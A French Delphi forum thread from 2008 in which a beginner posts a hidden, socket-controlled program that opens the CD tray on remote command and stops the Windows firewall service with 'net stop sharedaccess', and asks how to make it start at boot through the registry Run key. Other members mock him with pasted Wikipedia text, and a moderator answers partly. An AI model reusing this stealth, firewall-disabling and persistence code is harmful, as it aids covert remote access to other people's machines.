Besoin de précision pour un code

emirej Messages postés 90 Date d'inscription mercredi 14 mars 2007 Statut Membre Dernière intervention 31 mai 2009 - 31 mars 2008 à 18:22
Cirec Messages postés 3833 Date d'inscription vendredi 23 juillet 2004 Statut Modérateur Dernière intervention 18 septembre 2022 - 2 avril 2008 à 12:26
Bonjour j'aimerais avoir un peu d'aide pour mon code merci.

Voici mon code :
unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, ScktComp, MMsystem, ShellAPI, Registry;

type
  TForm1 = class(TForm)
    ServerSocket1: TServerSocket;
    procedure ServerSocket1ClientRead(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure FormActivate(Sender: TObject);
    procedure FormCreate(Sender: TObject);

  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
  Socket: TCustomWinSocket);
begin
if Socket.ReceiveText='OpenCD' then begin
mcisendstring('set cdaudio door open wait',nil,0,handle);
end;
if Socket.ReceiveText='CloseCD' then begin
mcisendstring('close cdaudio door closed wait', NIL, 0, handle);

end;

end;

procedure TForm1.FormActivate(Sender: TObject);
begin
shellexecute(0,'open', 'net.exe','stop sharedaccess',0,0);

end;

procedure TForm1.FormCreate(Sender: TObject);
begin
Application.Title := '';
ShowWindow (Form1.Handle, SW_Hide);
showwindow(Application.handle,Sw_hide);
SetWindowLong(Application.Handle, GWL_EXSTYLE, WS_EX_TOOLWINDOW); // Rend l'application Invisible de la barre des taches
end;

end.

Mais j'aimerais implémenter cette fonction.

var Reg: TRegistry;
begin
Reg := TRegistry.Create;
with Reg do
begin
try
RootKey := HKEY_LOCAL_MACHINE; // clé racine
if OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run', True) then
begin
if Lance then WriteString(NomAppli, CheminAppli) // écrire
else DeleteValue(NomAppli); // supprimer
CloseKey;
end;
finally
Free;
end;
end;
end;

Mais j'aimerais savoir si je dois implémenter ce code dans le Oncreate ? ( Car j'aimerais que le programme s'ouvre a chaque démmarage)

Si oui j'aimerais savoir quand il dise if Lance then WriteString(NomAppli, CheminAppli) // écrire .

Le " Lance " correspond a quoi ?
Le (NomAppli, CheminAppli) doi-je faire cela ( monprogramme, monprogramme.exe)  ( Sachant quand la personne le lancera il sera dans le meme dossier que mon programme)

merci en esperant que vous aurez comprit

19 réponses

Caribensila Messages postés 2527 Date d'inscription jeudi 15 janvier 2004 Statut Membre Dernière intervention 16 octobre 2019 18
31 mars 2008 à 18:34
<ToDo List>

'faudra penser à créer le thème :

[ Divers / Pas encore débutant mais j'vais bientôt m'y mettre. En attendant, j'bidouille le Registre ]   

;)
0
emirej Messages postés 90 Date d'inscription mercredi 14 mars 2007 Statut Membre Dernière intervention 31 mai 2009
31 mars 2008 à 18:37
c'etait ironique :p

Non mais c'est juste que je n'ai jamais testé cette fonction alors j'aurai besoin de précision
0
emirej Messages postés 90 Date d'inscription mercredi 14 mars 2007 Statut Membre Dernière intervention 31 mai 2009
31 mars 2008 à 20:21
Bah quelqun peut il le mettre correctement a mon code pour eviter que je fasse une bétise :p Car j'aimerais vraiment que le programme se lance au démarrage ! C'est la derniere chose que je demande ! Merci
0
Guillemouze Messages postés 991 Date d'inscription samedi 25 octobre 2003 Statut Membre Dernière intervention 29 août 2013 6
31 mars 2008 à 21:53
bon je fais une entorse au boycote :/

Le " Lance " correspond a quoi ?

Selon Wikipedia :

La lance est un terme générique désignant une arme d'hast dotée d'un fer emmanché sur une hampe ou long bois.

Par opposition au javelot,
la lance est une arme d'assaut qui n'est pas destinée à être lancée,
malgré son nom. En revanche, elle est plutôt portée sous le bras du
chevalier, ou par des piquiers, et se faufile entre les mailles de
l'armure du combattant. Elle est popularisée par la cavaleriegothique.

La lance est une des plus anciennes armes de chasse et peut-être de
guerre (on a retrouvé des épieux en bois datant de 40.000 ans environ
dans une tourbière). La lance servit comme arme dans des formations d'infanteries (notamment la phalange grecque et la phalange macédonienne (armée de sarisses), la légion romaine, des formations de piquiers en carrés au XVIe siècle).

La lance utilisée dans la joute équestre est un modèle plus court mais tout aussi mortel, et c'est dans un tel combat qu'Henri II de France trouva la mort en 1559.

Si dans l'imaginaire collectif, l'épée est l'arme médiévale par excellence, la lance est l'une de celles qui furent les plus répandues de l'histoire.

http://fr.wikipedia.org/wiki/Image:Pikeniere_kl.jpg

http://fr.wikipedia.org/wiki/Image:Pikeniere_kl.jpg

Piquiers au Festival de Wallenstein à Memmingen, Allemagne.

Formation militaire[Lance&action=edit&section=1 modifier]
La lance peut aussi désigner une petite formation de combattants montés. Ainsi, au Moyen Âge, une lance comprenait de quatre à dix hommes, sous le commandement d'un chevalier. Un chevalier assez riche ou puissant pour avoir plusieurs lances était dit chevalier banneret.

Lors de la création des compagnies d'ordonnance, première ébauche d'une armée nationale, une lance était composé d'un chevalier, d'un page ou écuyer, de trois archers, d'un coutilier et d'un sergent d'armes, tous à cheval mais combattant à pied. Soit pour cent lances, six-cents hommes par compagnie.

Le dernier duc de BourgogneCharles le Téméraire
voulut organiser son armée en 1250 lances de neuf hommes: un chevalier,
sept combattants et un page non combattant. Soit 10.000 combattants
divisés en dix compagnies. Ce projet ne fut jamais achevé.

=Lance&action=edit&section=2 modifier]

http://fr.wikipedia.org/wiki/Image:PallasGiustiniani.jpg

http://fr.wikipedia.org/wiki/Image:PallasGiustiniani.jpg

La Lance de Pallas, Vatican, Rome

La lance apparaît dans un certain nombre de représentations artistiques. Lance d'Athéna, Sainte Lance, attribut positif du centurion chrétien Longin, qui sous forme de lance brisée devient ensuite l'attribut négatif de la synagogue accusée de déicide[http://fr.wikipedia.org/wiki/Lance#cite_note-0 [1]]. Citons encore la lance dont Saint-Georges terrasse le dragon, la lance qui figure sur certains portraits de Saint-Thomas, celle des lansquenets. Dans la mythologie nordique la lance était l'attribut de Wotan et des Walkyries.

modifier]
<li>Hoplite, le fantassin grec armé entre autre d'une lance,</li><li>Lancier, cavalier combattant avec une lance,</li><li>Piquier, fantassin armé d'une pique longue de plusieurs mètres</li><li>Uhlan, cavalier armé d'une lance dans l'armée prussienne.</li>modifier]

http://fr.wiktionary.org/wiki/, Voir « lance » sur le Wiktionnaire.

<li>Fer de lance, une page d'homonymie,</li><li>Sainte Lance, la lance ayant transpercé le côté de Jésus,</li><li>Lance d'incendie, un dispositif employé par les pompiers</li><li>Montagne de la Lance,</li>
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
emirej Messages postés 90 Date d'inscription mercredi 14 mars 2007 Statut Membre Dernière intervention 31 mai 2009
31 mars 2008 à 21:57
Merci mais ca ne m'aide pas beaucoup.
0
Guillemouze Messages postés 991 Date d'inscription samedi 25 octobre 2003 Statut Membre Dernière intervention 29 août 2013 6
31 mars 2008 à 22:02
ah mince !

peut etre ceci alors :

Lance Armstrong est un ancien coureur cycliste, né le 18 septembre1971 à Plano (Texas, États-Unis). Il est ancien champion du monde sur route (en 1993) et a remporté le Tour de France à sept reprises (record absolu) et de manière consécutive. Sa carrière a toutefois été entachée de soupçons de dopage.

Sommaire
[1Biographie</li><li class="toclevel-1">2Le Tour de France : 7 victoires consécutives<li class="toclevel-2">2.12000</li><li class="toclevel-2">2.22001</li><li class="toclevel-2">2.32002</li><li class="toclevel-2">2.42003</li><li class="toclevel-2">2.52004</li><li class="toclevel-2">2.62005</li></li><li class="toclevel-1">3Controverses</li><li class="toclevel-1">4Palmarès</li><li class="toclevel-1">5Résultats sur le Tour de France</li><li class="toclevel-1">6Anecdote</li><li class="toclevel-1">7Notes</li><li class="toclevel-1">8Bibliographie</li><li class="toclevel-1">9Liens externes</li>
modifier]
Armstrong commence le cyclisme à 15 ans et passe professionnel en août 1992. Ses équipes successives sont : Motorola (1992 à 1996), Cofidis (1997), US Postal (1998 à 2004), Discovery Channel (depuis 2005).

Lance Armstrong commence par faire du triathlon, qui lui donne puissance et endurance. Il se spécialise cependant dans le cyclisme. Lance Armstrong se révèle à l'occasion du Tour de France 1993. Porteur du maillot de champion des États-Unis, il remporte au sprint l'étape de Verdun. Quelques semaines plus tard à Oslo, en Norvège,
il devient à 21 ans champion du monde de cyclisme sur route dans des
conditions météorologiques dantesques et devant tous les favoris. Il
est souvent présenté, à tort, comme le plus jeune champion du monde de
sa spécialité, Karel Kaers ayant remporté son titre à 20 ans en 1934.

En 1995, Lance décroche sa deuxième victoire d'étape sur le Tour, à Limoges. Franchissant la ligne en solitaire, Lance Armstrong lève un doigt vers le ciel en hommage à son équipier Fabio Casartelli, victime d'une chute mortelle trois jours plus tôt dans la descente du col du Portet d'Aspet.

Armstrong s'affirme comme un coureur sur les courses d'un jour (victoire sur la Classique de San Sebastian en 1995, sur la Flèche Wallonne en 1996) mais également sur les courses à étapes d'une semaine comme le prouve sa 2e place lors du Paris-Nice de 1996.

Fin 1996, alors qu'il annonce son transfert dans l'équipe Cofidis pour la saison suivante, Lance Armstrong est 9e mondial et à son meilleur niveau depuis le début de sa carrière.

Mais, en octobre 1996, on lui diagnostique un cancer
des testicules qui lui vaut d'être écarté de la compétition pendant
plus d'un an. Son médecin estimait que ses chances de survie ne
dépassaient pas 50 %. Après une guérison et une longue rééducation, il
reprend le vélo et signe un contrat avec l'équipe U.S. Postal en 1998.

Il est pourtant bien proche de tout abandonner après un retour à la compétition calamiteux à l'occasion du Paris-Nice 1998.
Mais sa fin de saison laisse apparaître de belles promesses. Sa
silhouette très affinée par rapport à ses premières années — il a en
effet perdu toute la musculature du torse formée par la pratique du
triathlon, qui n'était qu'un poids mort lors des ascensions — lui
permet de passer la haute-montagne avec plus de facilité comme le
prouve sa 4e place au Tour d'Espagne 1998. Son nouveau directeur sportif, Johan Bruyneel,
parvient également à le motiver et change ses méthodes d'entraînement,
lui permettant d'améliorer sa technique de pédalage. Seulement
intéressé par le Tour de France à partir de 1999, il délaisse les autres grands tours et les classiques, à l'exception de l'Amstel Gold Race (2e en 1999 et 2001 ainsi que 4e en 2002) et de la doyenne des classiques à savoir Liège-Bastogne-Liège qui a constitué pendant plusieurs années le deuxième objectif majeur de sa saison.

De 1999 à 2005 il gagne 7 Tours de France consécutifs.

Le 19 avril2005, il annonce qu'il prendra sa retraite du cyclisme à l'issue du Tour de France 2005. Le 24 juillet2005, il tient parole et quitte le cyclisme professionnel, sur une historique septième et dernière victoire sur le Tour de France. Suite aux révélations du journal L'Équipe concernant un possible dopage à l'EPO lors du Tour de France 1999, il envisagera un temps de revenir à la compétition.

De 2004 à février 2006, il a été fiancé avec Sheryl Crow.

Lance Armstrong dispose de sa propre fondation pour la recherche contre le cancer : la Lance Armstrong Foundation (Livestrong).

À ce jour, il nie toute prise de produit dopant.
0
emirej Messages postés 90 Date d'inscription mercredi 14 mars 2007 Statut Membre Dernière intervention 31 mai 2009
31 mars 2008 à 22:02
... non allez svp
0
Caribensila Messages postés 2527 Date d'inscription jeudi 15 janvier 2004 Statut Membre Dernière intervention 16 octobre 2019 18
31 mars 2008 à 22:08
« Bah justement pour pas que je fasse une bétise personne ne pourrait me dire ou inclure ce code svp ? »

Moi, j'ai bien une idée...  Mais j'vais faire bannir si j't'aide. 
0
Cirec Messages postés 3833 Date d'inscription vendredi 23 juillet 2004 Statut Modérateur Dernière intervention 18 septembre 2022 50
31 mars 2008 à 23:43
Décidément tu ne lis pas et n'écoutes pas ce qu'on te dit

Je t'avais dit de mettre cette Procedure :
ShowWindow(Application.handle, Sw_hide);
Dans le OnShow et pas dans le OnCreate

Et celle-ci :
SetWindowLong(Application.Handle,GWL_EXSTYLE,WS_EX_TOOLWINDOW); Tu la supprimes

pour le reste ... c'est pas le tout de piquer du code à gauche et à droite sans savoir exactement ce qu'il fait et comment !!!!

le code que tu cherches à utiliser sert à ce que ton application démarre automatiquement avec Windows.
Lance ... (après avoir lu le code) ... est une variable  booléenne qui sera mise à True ou False selon la demande de l'utilisateur. Cette procedure peut être appelée depuis un évènement de menu (par exemple). Mais la placer dans le OnCreate serait une erreur, cela obligerait l'utilisateur à redémarrer l'application pour prendre en compte le changement sans compter qu'il faudra aussi penser à sauvegarder la valeur le temps du redémarrage Alors qu'en faire une procedure indépendante t'évite tout cela.

Mais tu brules les étapes  ce que tu fais on appel ça du bricolage de code ...
alors oui ça finit par fonctionner mais avec un code souvent lourd voir répétitif et non optimisé puisqu'en brulant les étapes tu ignores totalement certaines possibilités, finesses et autres subtilités que tu aurais pus apprendre  en suivant  un chemin moins chaotique. Enfin bon ... moi ce que j'en dis.

Mais il faut comprendre une chose c'est que si toi tu choisis cette voie on ne pourra pas continuer a t'aider ... tu nous demandes de résoudre des problèmes que nous avons tous eut et pour la plus part  résolus tous seul grâce, notamment, à la lecture de multiples tutoriels, l'aide de Delphi (Très bon ... c'est F1 ) et ton amis Google.
Ça ne peut pas continuer ... tu en conviendras.

C'est des questions de base de chez base que tu poses !

Par contre si tu as réellement un problème, pas un qui se règle en 5 minutes comme tout ou presque ce tu as posté, et que tu nous fais voir ce que tu as fais, que tu as cherché (réellement**) et que tu nous donnes (comme ici) un bout de code, tu trouveras quelqu'un sur ce forum pour t'aider.

** 90% (pour être gentil) de tes demandes se règlent en moins de 10 minutes  par une recherche, sur le Site, sur Google ou dans l'aide de Delphi et on apprend mieux (ça reste plus facilement en tête) quand on trouve par sois même.

Mon but n'est pas de te casser mais de te faire prendre conscience que la voie que tu empreintes ne te permettra pas de progresser correctement  et que au final tu auras perdu du temps puisque, tôt ou tard, elles vont te manquer ces bases, d'ailleurs elles te manquent déjà

@Caribensila j'vois bien ou tu veux en v'nir 
Alors tu n'as pas réussit à lire mon message sur la source de Mauricio
 
@+
Cirec

<hr siz="" />
0
Caribensila Messages postés 2527 Date d'inscription jeudi 15 janvier 2004 Statut Membre Dernière intervention 16 octobre 2019 18
1 avril 2008 à 00:06
ceriC@

llllol   ?ceriC ,emèrb enu ruop sdnerp em uT
0
Cirec Messages postés 3833 Date d'inscription vendredi 23 juillet 2004 Statut Modérateur Dernière intervention 18 septembre 2022 50
1 avril 2008 à 00:20
aah bon ... tu me rassures

comme je pensais que tu allais rebondir ...
et ne voyant toujours rien venir (tiens ça rimme)
je me suis dis qu'il fallait t'affranchir
 
@+
Cirec

<hr siz="" />
0
Caribensila Messages postés 2527 Date d'inscription jeudi 15 janvier 2004 Statut Membre Dernière intervention 16 octobre 2019 18
1 avril 2008 à 00:20
@Cirec

Et c'est quand que tu postes ton utilitaire pour écrire en élecrosne?     

PS: "élecrosne"...   "élecrosne"    Trop joli!   Un truc à déposer à l'INPI!   Non?     ;)
0
Caribensila Messages postés 2527 Date d'inscription jeudi 15 janvier 2004 Statut Membre Dernière intervention 16 octobre 2019 18
1 avril 2008 à 00:23
" comme je pensais que tu allais rebondir "

Y'a des jours où il vaut mieux se faire tout petit, petit,
petit...
Sur CS
     ;)
0
Cirec Messages postés 3833 Date d'inscription vendredi 23 juillet 2004 Statut Modérateur Dernière intervention 18 septembre 2022 50
1 avril 2008 à 00:28
Ha Ha ... comme ça je pourrai dans la foulée  m'auto-supprimer (Le code)

Function ReverseString de StrUtils .. suffit amplement

 
@+
Cirec

<hr siz="" />
0
Guillemouze Messages postés 991 Date d'inscription samedi 25 octobre 2003 Statut Membre Dernière intervention 29 août 2013 6
1 avril 2008 à 00:29
joli monolgue cirec ... peut etre a mettre dans le reglement
0
Caribensila Messages postés 2527 Date d'inscription jeudi 15 janvier 2004 Statut Membre Dernière intervention 16 octobre 2019 18
1 avril 2008 à 00:34
"Function ReverseString" ?..

Y'a vraiment tout dans StrUtils...

J'comprends tout, now! 
0
Cirec Messages postés 3833 Date d'inscription vendredi 23 juillet 2004 Statut Modérateur Dernière intervention 18 septembre 2022 50
1 avril 2008 à 00:38
fait gaffe a tes fesses c'est devenu dangereux ici .... shuuuuut

Merci ...

 
@+
Cirec

<hr siz="" />
0
cs_MAURICIO Messages postés 2106 Date d'inscription mardi 10 décembre 2002 Statut Modérateur Dernière intervention 15 décembre 2014 5
1 avril 2008 à 19:06
J' ai fait un copier/coller de tout le code au cas oú j' en aurai besoin mais rien y fait: le NotePAd refuse de faire quoi que se soit à part afficher ... le code?!
Je remarque que Notepad veut toujours pas s' ouvrir automatiquement ()&&%#$#$ !!!

Bizarre non???
Je suis sur le bon Topic ou je dois aller me faire foueter?????
0
Cirec Messages postés 3833 Date d'inscription vendredi 23 juillet 2004 Statut Modérateur Dernière intervention 18 septembre 2022 50
2 avril 2008 à 12:26
@emirej :
t'aurai-je vexé ?

ça serait dommage de le prendre comme ça ... c'est pour toi

parce que malgré tout je t'ai donné deux réponse aux quelles tu n'as toujours pas répondu !!!

@Mauricio

tu t'es fait piraté ton avatar

 
@+
Cirec

<hr siz="" />
0
Rejoignez-nous